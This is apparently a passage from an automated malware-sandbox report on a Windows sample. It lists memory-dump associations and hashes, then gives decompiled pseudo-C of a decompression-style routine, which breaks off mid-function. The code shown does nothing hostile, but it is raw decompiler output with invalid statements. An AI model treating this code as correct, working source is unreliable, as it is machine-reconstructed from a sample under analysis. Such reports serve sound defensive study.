                  • Associated: 00000000.00000002.199774427.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199790242.0000000000408000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199797277.000000000040A000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199803756.0000000000413000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199834496.0000000000422000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199859273.000000000042A000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199876622.000000000042D000.00000002.00020000.sdmp Download File
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 46e38dc9042d38c3d36f7f10ec43a7b3aa55cd06347f931a7d3c587032d94121
                  • Instruction ID: f909a51a05dfa9c5f202b5373a38b9e5f11f80519cee44c22f430a43d8e85a48
                  • Opcode Fuzzy Hash: 46e38dc9042d38c3d36f7f10ec43a7b3aa55cd06347f931a7d3c587032d94121
                  • Instruction Fuzzy Hash: 74713371E00229CBDF28CF98C844BADBBB1FF44305F15816AD856BB281C7796A96DF44
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00406AC7, Relevance: 5.2, APIs: 4, Instructions: 168COMMON
                  Download Yara Rule
                  C-Code - Quality: 98%
                  			E00406AC7() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xa;
						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
					} else {
						 *(__ebp - 0x84) = 9;
						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
					}
					while(1) {
						 *(_t613 - 0x54) = _t606;
						while(1) {
							L133:
							_t531 =  *_t606;
							_t589 = _t531 & 0x0000ffff;
							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
							if( *(_t613 - 0xc) >= _t565) {
								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
								 *(_t613 - 0x40) = 1;
								_t532 = _t531 - (_t531 >> 5);
								 *_t606 = _t532;
							} else {
								 *(_t613 - 0x10) = _t565;
								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
								 *_t606 = (0x800 - _t589 >> 5) + _t531;
							}
							if( *(_t613 - 0x10) >= 0x1000000) {
								goto L139;
							}
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								L170:
								_t568 = 0x22;
								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
								_t535 = 0;
								L172:
								return _t535;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L139:
							_t533 =  *(_t613 - 0x84);
							while(1) {
								 *(_t613 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t613 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M00407061))) {
										case 0:
											if( *(_t613 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t534 =  *( *(_t613 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t570);
											_push(9);
											_pop(_t571);
											_t609 = _t538 / _t570;
											_t540 = _t538 % _t570 & 0x000000ff;
											asm("cdq");
											_t604 = _t540 % _t571 & 0x000000ff;
											 *(_t613 - 0x3c) = _t604;
											 *(_t613 - 0x1c) = (1 << _t609) - 1;
											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
											_t612 = (0x300 << _t604 + _t609) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
												L10:
												if(_t612 == 0) {
													L12:
													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t612 = _t612 - 1;
													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
												} while (_t612 != 0);
												goto L12;
											}
											if( *(_t613 - 4) != 0) {
												GlobalFree( *(_t613 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t613 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 1;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t45 = _t613 - 0x48;
											 *_t45 =  *(_t613 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t613 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t613 - 0x40);
											if(_t546 ==  *(_t613 - 0x74)) {
												L20:
												 *(_t613 - 0x48) = 5;
												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t613 - 0x74) = _t546;
											if( *(_t613 - 8) != 0) {
												GlobalFree( *(_t613 - 8)); // executed
											}
											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
											 *(_t613 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
											 *(_t613 - 0x84) = 6;
											 *(_t613 - 0x4c) = _t553;
											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
											 *(_t613 - 0x54) = _t606;
											goto L133;
										case 3:
											L21:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 3;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											_t67 = _t613 - 0x70;
											 *_t67 =  &(( *(_t613 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
											L23:
											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
											if( *(_t613 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t606;
											_t589 = _t531 & 0x0000ffff;
											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
											if( *(_t613 - 0xc) >= _t565) {
												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
												 *(_t613 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												 *_t606 = _t532;
											} else {
												 *(_t613 - 0x10) = _t565;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
												 *_t606 = (0x800 - _t589 >> 5) + _t531;
											}
											if( *(_t613 - 0x10) >= 0x1000000) {
												goto L139;
											}
										case 5:
											goto L137;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 8:
											goto L0;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L89;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t258 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t258;
											0 | _t258 = _t258 + _t258 + 9;
											 *(__ebp - 0x38) = _t258 + _t258 + 9;
											goto L75;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x28);
											goto L88;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L88:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L89:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 0x12:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *(__ebp - 0x7c) = 0x14;
												goto L145;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											 *(_t613 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											L145:
											__eax =  *(__ebp - 0x40);
											 *(__ebp - 0x50) = 1;
											 *(__ebp - 0x48) =  *(__ebp - 0x40);
											goto L149;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											L149:
											__eflags =  *(__ebp - 0x48);
											if( *(__ebp - 0x48) <= 0) {
												__ecx =  *(__ebp - 0x40);
												__ebx =  *(__ebp - 0x50);
												0 = 1;
												__eax = 1 << __cl;
												__ebx =  *(__ebp - 0x50) - (1 << __cl);
												__eax =  *(__ebp - 0x7c);
												 *(__ebp - 0x44) = __ebx;
												while(1) {
													 *(_t613 - 0x88) = _t533;
													goto L1;
												}
											}
											__eax =  *(__ebp - 0x50);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
											__eax =  *(__ebp - 0x58);
											__esi = __edx + __eax;
											 *(__ebp - 0x54) = __esi;
											__ax =  *__esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												__cx = __ax >> 5;
												__eax = __eax - __ecx;
												__edx = __edx + 1;
												__eflags = __edx;
												 *__esi = __ax;
												 *(__ebp - 0x50) = __edx;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L148;
											} else {
												goto L146;
											}
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
